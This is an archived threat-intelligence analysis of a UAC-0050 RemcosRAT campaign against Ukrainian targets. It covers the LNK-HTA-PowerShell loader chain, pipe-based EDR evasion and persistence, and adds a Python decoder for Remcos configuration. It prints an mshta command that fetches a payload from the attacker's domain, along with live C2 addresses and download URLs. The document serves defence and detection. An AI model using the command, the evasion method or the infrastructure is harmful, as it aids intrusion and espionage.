{
	"id": "b8bb97f1-9073-4924-b118-1f67eed56768",
	"created_at": "2026-04-06T00:20:10.826065Z",
	"updated_at": "2026-04-10T13:11:18.447506Z",
	"deleted_at": null,
	"sha1_hash": "b174a32ed9f2f50e5174a7ae00f02c10f6f81067",
	"title": "UAC-0050 Remcos RAT: Pipe Method Used for Evasion in Ukraine Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4948517,
	"plain_text": "UAC-0050 Remcos RAT: Pipe Method Used for Evasion in Ukraine Attack\r\nBy Uptycs Threat Research\r\nPublished: 2024-01-03 · Archived: 2026-04-05 13:50:37 UTC\r\nAuthors: Karthickkumar Kathiresan, Shilpesh Trivedi\r\nKnown for its history of relentless cyber-attacks against Ukrainian targets, the UAC-0050 threat group is at it again. This time, Uptycs researchers have observed a data-transfer technique that gives the malware a more clandestine channel for moving its payload between processes, one that sidesteps the process-injection behaviours that Endpoint Detection and Response (EDR) and antivirus products most commonly watch for.\r\nThe group's weapon of choice is RemcosRAT, a well-known remote surveillance and control tool that has long been at the forefront of its espionage arsenal. In this latest campaign, UAC-0050 has added a pipe-based interprocess communication step to its loader, a sign of the group's continued adaptability.\r\nWindows pipes give the loader a covert channel for handing data to another process without the cross-process memory writes that EDR and antivirus systems routinely flag. Although not entirely new, the technique marks a notable step up in the sophistication of the group's tradecraft.\r\nTargeting the Ukrainian government, the UAC-0050 campaign points to a politically motivated agenda with potential geopolitical implications. The use of RemcosRAT together with pipe-based data movement underlines the group's focus on stealth and intelligence gathering. While state sponsorship remains speculative, the group's activities pose a real risk, especially to government sectors that depend on Windows systems.\r\nThis blog outlines the technicalities of the attack, with analysis from our researchers at Uptycs. 
From understanding how Windows pipes are used for interprocess communication to analysing the real-world impact of these evasion techniques, we offer a comprehensive look at this cyber-espionage operation.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 1 of 14\n\nInitial investigation\r\nOur Threat Research Team initiated an investigation after the Uptycs platform alerted on a suspicious .lnk file on December 21, 2023. Analysis revealed UAC-0050's deployment of RemcosRAT in a targeted cyber intelligence operation against Ukrainian government agencies.\r\nThe initial attack vector has not been pinpointed, though the evidence points to phishing or spam emails posing as job offers: consultancy roles with the Israel Defense Forces (IDF) aimed at Ukrainian military personnel.\r\nThe lure document (Figure 1) describes roles centred on training IDF soldiers in modern warfare techniques, a ruse designed to get military personnel to open it.\r\nFigure 1–RemcosRAT Military theme\r\nCorroborating these findings, the Ukrainian government officially acknowledged a similar attack pattern in early December 2023. As reported on its official website, that incident aligns with the modus operandi of UAC-0050 and further confirms the group's persistent use of RemcosRAT in its cyber-espionage campaigns.\r\nMalware operation\r\nThe LNK file initiates the download of an HTA file. The HTA file carries a VBScript that, on execution, runs a PowerShell script. That PowerShell script downloads a malicious payload (word_update.exe) from a server. When launched, word_update.exe starts cmd.exe and hands it malicious data through a pipe. 
Consequently, explorer.exe is launched with the RemcosRAT payload resident in its memory.\r\nFigure 2–RemcosRAT workflow\r\nTechnical analysis\r\nThe investigation begins with a .lnk file. A .lnk file is a Windows shortcut that points to another file, folder, or application, letting users open the linked resource without navigating to its location. Attackers create .lnk files that appear to be shortcuts to legitimate applications or documents but actually point to, and execute, malicious code.\r\nIn this case, the malicious .lnk file enumerates the antivirus products installed on the target computer and checks whether a product's display name is 'Windows Defender'. If it is, the name is replaced with an empty string, so the condition in the subsequent 'if' statement evaluates false and its 'exit' statement never runs; execution then continues with the rest of the script. In effect, the loader aborts when some other antivirus product is detected and proceeds when Windows Defender is the only one present.\r\nFigure 3–LNK file\r\nTowards the end of the .lnk file, the threat actor has obfuscated the URL string. After deobfuscation, the URL is passed to MSHTA. The execution command is:\r\n\"c:\\windows\\system32\\mshta.exe\" http[:]//new-tech-savvy[.]com/6[.]hta\r\nWe retrieved the 6.hta file for analysis and found that it contains a fully obfuscated VBScript.\r\nFigure 4–HTA file contains VBScript\r\nDeobfuscating the VBScript yielded a PowerShell script; the snapshot below shows the deobfuscated result.\r\nThe PowerShell script below represents the deobfuscated flow:\r\n1. It initializes a Base64-encoded string, referred to as $lcjcj, and a second Base64-encoded string denoted $VZnHIGNa.\r\n2. 
It creates an AES decryption object, $WrwQUj, setting CipherMode, PaddingMode, BlockSize, KeySize, and Key, with the key taken from the Base64-decoded value of $VZnHIGNa.\r\n3. It extracts the initialization vector (IV) from the payload.\r\n4. It creates a decryptor and AES-decrypts a portion of the payload.\r\n5. It wraps the decrypted bytes in memory streams and a GzipStream to decompress them.\r\n6. It reads the decompressed data into a byte array.\r\n7. It converts the byte array to a UTF-8 string.\r\n8. It pipes that string into a new PowerShell process (the | powershell - syntax) to execute it.\r\n9. The actual payload is held in the variable $hQkGkZK; it is the result of executing the PowerShell code contained in the original Base64-encoded string $lcjcj.\r\nFigure 5–Uptycs alert: MSHTA execution with internet\r\nThe output of this stage ($hQkGkZK) is another PowerShell script containing encoded data, as shown in the snapshot below.\r\nFigure 6–PowerShell script\r\n1. It builds file paths from the user's AppData directory and specific file names.\r\n2. It checks whether particular files (word_update.exe and ofer.docx) already exist, using Test-Path.\r\n3. If these files are present, it invokes the DcO function to act on them according to their file extensions. 
If they are absent, it calls the JWF function to download the data, writes it to disk with JBH, and then calls DcO to act on the files according to their extensions.\r\nFigure 7–PowerShell script and payload execution\r\nUptycs captured all PowerShell activity deemed suspicious and presents the deobfuscated content in the snapshot.\r\nFigure 8–Uptycs alert: PowerShell suspicious entry\r\nThe payloads, word_update.exe and ofer.docx, are downloaded from the domain new-tech-savvy[.]com and written to the root of the Roaming folder (%appdata%).\r\nPayload\r\nRequest for downloading word_update.exe.\r\nFigure 9–Downloading executable payload\r\nWhen word_update.exe runs, it copies itself under a new name into a newly created folder in the Roaming directory (%appdata%):\r\nFigure 10–Uptycs alert: Process execution from AppData folder\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\WordpadService\\fmTask_dbg.exe\r\nThe malware establishes persistence by dropping an LNK file into the Startup folder, so fmTask_dbg.exe runs each time the user logs on:\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fmTask_dbg.lnk\r\nThe file carries unusual resource data, which is copied into memory and decrypted with an XOR loop. This is the first level of decryption.\r\nFigure 11–XOR loop\r\nNext, it calls the WriteFile API with the file handle 0x59c, which refers to an unnamed pipe object under \\FileSystem\\Npfs, the named-pipe file system driver; Windows implements anonymous pipes as Npfs objects, so an 'unnamed' pipe handle still resolves there. 
Unnamed pipes require their handles to be passed to the communicating processes (typically through handle inheritance at process creation, or DuplicateHandle) before any data can be exchanged.\r\nFigure 12–Handle of unnamed pipe object in which data written by WriteFile API\r\nThreat actors often rely on process injection or hollowing to execute malicious code inside legitimate processes; those techniques involve creating a suspended process or writing into another process's memory, both of which EDR/AV products monitor closely. Here the attacker took a different route. The loader first spawned a legitimate child process, cmd.exe, with the CreateProcess API and without the suspended flag. It then moved the first-level decrypted data (Figure 11) into cmd.exe through the pipe.\r\nFigure 13–Uptycs event alert: Createpipe write event\r\nThe transfer was done with the WriteFile API on a handle to the unnamed pipe; once the write completed, the data had moved from word_update.exe to cmd.exe with no cross-process memory-write call by the parent. Figure 14 shows the memory of cmd.exe, in a region with read-write protection, holding the malicious data received through the pipe.\r\nFigure 14–Data moved to memory of cmd.exe\r\nThe data in memory is decrypted at runtime and the Remcos Remote Access Trojan (RAT) is executed. explorer.exe is then launched and the malicious data is moved into that process's memory as well.\r\nFigure 15–Remcos binary in the memory of cmd.exe (RW)\r\nThe Remcos execution flow from word_update.exe:\r\nFigure 16–Remcos execution flow from word_update.exe\r\nUptycs capture of explorer.exe with malicious activity:\r\nFigure 17–Uptycs alert: Explorer.exe with malicious activity\r\nRemcos binary\r\nExtracting the binary from cmd.exe memory gave us the RemcosRAT payload. 
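As the following figures show, the payload keeps its configuration in an RC4-encrypted RCDATA resource, which is easiest to recover with a script. The Python below is an added example, not code from the Uptycs post or from Remcos itself. It assumes the commonly documented Remcos SETTINGS layout, which the post does not spell out: the first byte of the resource is the RC4 key length, followed by the key, followed by the RC4 ciphertext, with configuration fields separated by a pipe character, the bytes 0x1e 0x1e 0x1f, and another pipe character. The resource blob it decodes is constructed inline from the values the post recovered (with a made-up key), so it runs offline; the field order in the parser follows the order the post lists and is illustrative, not the real Remcos field indices.

```python
# Added example (not from the Uptycs post or from Remcos): recover and parse an
# RC4-encrypted Remcos SETTINGS resource. Assumed layout (commonly documented
# for Remcos, not stated on the page): [key length][key][RC4 ciphertext].

# Assumed field delimiter used by Remcos 4.x configs: '|' 0x1e 0x1e 0x1f '|'
SEP = b'|' + bytes([0x1e, 0x1e, 0x1f]) + b'|'


def rc4(key, data):
    # Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def split_settings(blob):
    # Split the resource into (key, ciphertext) using the length-prefixed key.
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError('malformed SETTINGS resource: bad key length')
    return blob[1:1 + key_len], blob[1 + key_len:]


def decrypt_settings(blob):
    # Return the decrypted config split into its raw fields.
    key, ciphertext = split_settings(blob)
    return rc4(key, ciphertext).split(SEP)


def parse_config(fields):
    # Illustrative field order only (mirrors the order the post lists); real
    # Remcos builds use version-specific indices, so confirm them against a
    # known sample before relying on this mapping. Field 0 holds one or more
    # host:port:password entries separated by ';'.
    c2 = []
    for entry in fields[0].decode('latin-1').split(';'):
        if not entry:
            continue
        parts = entry.rsplit(':', 2)
        if len(parts) != 3:
            raise ValueError('unexpected C2 entry: ' + entry)
        host, port, password = parts
        c2.append({'host': host, 'port': int(port), 'password': password})
    names = ['botnet', 'mutex', 'copy_file', 'copy_folder',
             'keylog_folder', 'screenshot_folder', 'keylog_file']
    cfg = {'c2': c2}
    for name, value in zip(names, fields[1:1 + len(names)]):
        cfg[name] = value.decode('latin-1')
    return cfg


def build_sample_resource(key, fields):
    # Constructed test data: encrypt plaintext fields with the assumed layout so
    # the decoder can be exercised without a live sample.
    plaintext = SEP.join(fields)
    return bytes([len(key)]) + key + rc4(key, plaintext)


# Constructed sample using the values the post recovered from the real config.
SAMPLE_KEY = b'uptycs-example-key'          # constructed, not the real key
SAMPLE_FIELDS = [b'194.87.31.229:6438:1;', b'RemoteHost', b'Rmc-D6LMC9',
                 b'remcos.exe', b'Remcos', b'Remcos', b'Screenshots', b'logs.dat']
SAMPLE_RESOURCE = build_sample_resource(SAMPLE_KEY, SAMPLE_FIELDS)


def extract_sample_config():
    return parse_config(decrypt_settings(SAMPLE_RESOURCE))


if __name__ == '__main__':
    for k, v in extract_sample_config().items():
        print(k, v)
```

Running the block prints the parsed configuration of the constructed sample. Against a real sample, read the RCDATA resource bytes (for example with pefile) and pass them to decrypt_settings in place of SAMPLE_RESOURCE. The key-length prefix is the first thing to check when decryption yields garbage, since a wrong prefix shifts both the key and the ciphertext.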
Within the payload's resource section, an RCDATA resource stores data encrypted with RC4.\r\nFigure 18–RC4 encrypted data in RCDATA\r\nUsing CyberChef, we decrypted the data and recovered the RemcosRAT configuration.\r\nFigure 19–CyberChef decryption\r\nConfiguration:\r\nC2 host:port:password: 194.87.31.229:6438:1\r\nBotnet: RemoteHost\r\nMutex: Rmc-D6LMC9\r\nCopy file: remcos.exe\r\nCopy folder: Remcos\r\nKeylog folder: Remcos\r\nScreenshot folder: Screenshots\r\nKeylog file: logs.dat\r\nThe Remcos version identified is 4.9.2 Pro. It gathers information about the victim, including the computer name and username.\r\nRemcosRAT clears cookies and saved login data from Internet Explorer, Firefox, and Chrome, which hampers the recording of evidence of the infection on the victim machine.\r\nFigure 20–Browser data\r\nIt sets registry values for the executable path, licence, and the time associated with its thread.\r\nFigure 21–Registry key\r\nRequest for downloading ofer.docx.\r\nFigure 22–Downloading document payload\r\nDropped-file alert from Uptycs.\r\nFigure 23–Uptycs alert: Dropped doc file\r\nOnce ofer.docx has been downloaded, it is opened with winword.exe. The file contains no macros; it only displays a defence-themed message from a consultant to the Israel Defense Forces (IDF).\r\nFigure 24–Document File with Ukrainian language and Defense theme\r\nFigure 25–Translated word document\r\nAt the time of analysis, VirusTotal did not detect word_update.exe at all. 
However, Uptycs XDR detected RemcosRAT at the same time.\r\nFigure 26–VirusTotal detection\r\nUptycs XDR coverage\r\nUptycs XDR demonstrates robust detection capabilities, featuring built-in YARA support and advanced functionality for identifying threats such as RemcosRAT. Users can scan for potential risks and draw on the contextual detection of XDR to access key details about detected malware. The toolkit data section within the detection screen gives comprehensive profiles of identified items.\r\nUptycs can also decode and decrypt obfuscated PowerShell scripts, extending its reach for threat detection and mitigation. A notable feature is the detection graph on the detection page, a visual representation of process relationships, including connected files, sockets, and lateral movement during an incident.\r\nFigure 27–Uptycs detection\r\nConclusion and precaution\r\nTo defend against malware attacks like RemcosRAT, it is recommended to:\r\n- Use email filtering solutions that identify and quarantine spam before it reaches users' inboxes.\r\n- Refrain from clicking links or opening attachments in emails identified as spam.\r\n- Deploy network monitoring to identify abnormal communication patterns that could signal remote access tools.\r\n- Regularly review and harden system configurations, ensuring that unnecessary services and startup entries are disabled or closely monitored.\r\n- Use behaviour-based tooling to spot activity suggesting a RAT is establishing persistence or communicating with command and control servers; in this case that means an executable running from %appdata% spawning cmd.exe, writing to an anonymous pipe, dropping a Startup-folder LNK, and explorer.exe subsequently running with the same payload in memory.\r\nIOC\r\nFile name 
MD5\r\nLnk file          56154fedaa70a3e58b7262b7c344d30a\r\n6.hta             9b777d69b018701ec5ad19ae3f06553f\r\nofer.docx         74865c6c290488bd5552aa905c02666c\r\nword_update.exe   7c05cfed156f152139a6b1f0d48b5cc1\r\nfmTask_dbg.exe    7c05cfed156f152139a6b1f0d48b5cc1 (identical to word_update.exe: it is the renamed self-copy)\r\nRemcos            0b2d0eb5af93a3355244e1319e3de9da\r\nRelated hash\r\nFile name         MD5\r\nLnk               7f87d36c989a11edf0de9af392891d89\r\nLnk               f5ee6aa31c950dfe55972e50e02201d3\r\nLnk               5c734bb1e41fab9c7b2dabd06e27bc7b\r\nshablon.hta       1c3e1e0319dc6aa24166d5e2aaaec675\r\nzayava.docx       818beece85ecd90d413782dd51d939b1\r\nPs1               8158b43f745e0e7a519458b0150e1b61\r\nPs1               f71ef85824f906856cb3d2205058bdd2\r\nPs1               8bebea01d914a3c3a2d876417f7d1d54\r\nRemcos            b1f8484ee01a7730938210ea6e851888\r\nURL\r\ncluster00\u003cX\u003e[.]ovh[.]net\r\n194[.]87.31[.]229\r\n46[.]249.58[.]40\r\nnew-tech-savvy[.]com/6[.]hta\r\nnew-tech-savvy[.]com/5[.]hta\r\nnew-tech-savvy[.]com/algo[.]hta\r\nnew-tech-savvy[.]com/shablon[.]hta\r\nnew-tech-savvy[.]com/word_update[.]exe\r\nnew-tech-savvy[.]com/zayava[.]docx\r\nnew-tech-savvy[.]com/ofer[.]docx\r\nSource: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method"
	],
	"report_names": [
		"remcos-rat-uac-0500-pipe-method"
	],
	"threat_actors": [
		{
			"id": "a2e59183-d83f-47aa-adf9-97925d8e6452",
			"created_at": "2023-12-08T02:00:05.762162Z",
			"updated_at": "2026-04-10T02:00:03.496538Z",
			"deleted_at": null,
			"main_name": "UAC-0050",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0050",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434810,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.pdf",
		"text": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.txt",
		"img": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.jpg"
	}
}